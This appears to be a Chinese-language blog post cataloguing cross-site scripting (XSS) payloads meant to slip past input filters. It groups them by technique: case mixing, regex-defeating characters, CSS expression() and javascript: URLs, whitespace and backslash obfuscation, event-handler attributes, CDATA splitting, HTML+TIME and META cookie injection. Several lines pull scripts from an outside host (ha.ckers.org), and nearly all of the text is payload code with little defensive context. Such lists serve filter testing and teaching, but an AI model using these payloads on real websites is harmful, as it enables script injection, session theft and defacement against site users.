<sCript>alert(‘d’)</scRipT>
2. 利用多加一些其它字符来规避Regular Expression的检查
<<script>alert(‘c’)//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
3. 以其它扩展名取代.js
<script src="bad.jpg"></script>
4. 将Javascript写在CSS档里
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
example:
body {
background-image: url(‘javascript:alert("XSS");’)
}
5. 在script的tag里加入一些其它字符
<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. 使用tab或是new line来规避
<img src="jav ascr ipt:alert(‘XSS3′)">
<img src="jav ascr ipt:alert(‘XSS3′)">
<IMG SRC="jav ascript:alert(‘XSS’);">
-> tag
-> new line
7. 使用"\"来规避
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
8. 使用Hex encode来规避(也可能会把";"拿掉)
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9. script in HTML tag
<body onload=」alert(‘onload’)」>
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate,
onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus,
onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur,
onbounce, oncellchange, onchange, onclick, oncontextmenu,
oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged,
ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend,
ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror,
onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout,
onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload,
onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove,
onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend,
onmovestart, onpaste, onpropertychange, onreadystatechange, onreset,
onresize, onresizeend, onresizestart, onrowenter, onrowexit,
onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange,
onselectstart, onstart, onstop, onsubmit, onunload
10. 在swf里含有xss的code
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. 利用CDATA将xss的code拆开,再组合起来。
<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. 利用HTML+TIME。
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. 透过META写入Cookie。
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
14. javascript in src , href , url
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
<img src="javascript:alert(‘XSS3′)">
<IMG DYNSRC="javascript:alert(‘XSS20′)">
<IMG LOWSRC="javascript:alert(‘XSS21′)">
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
没有评论:
发表评论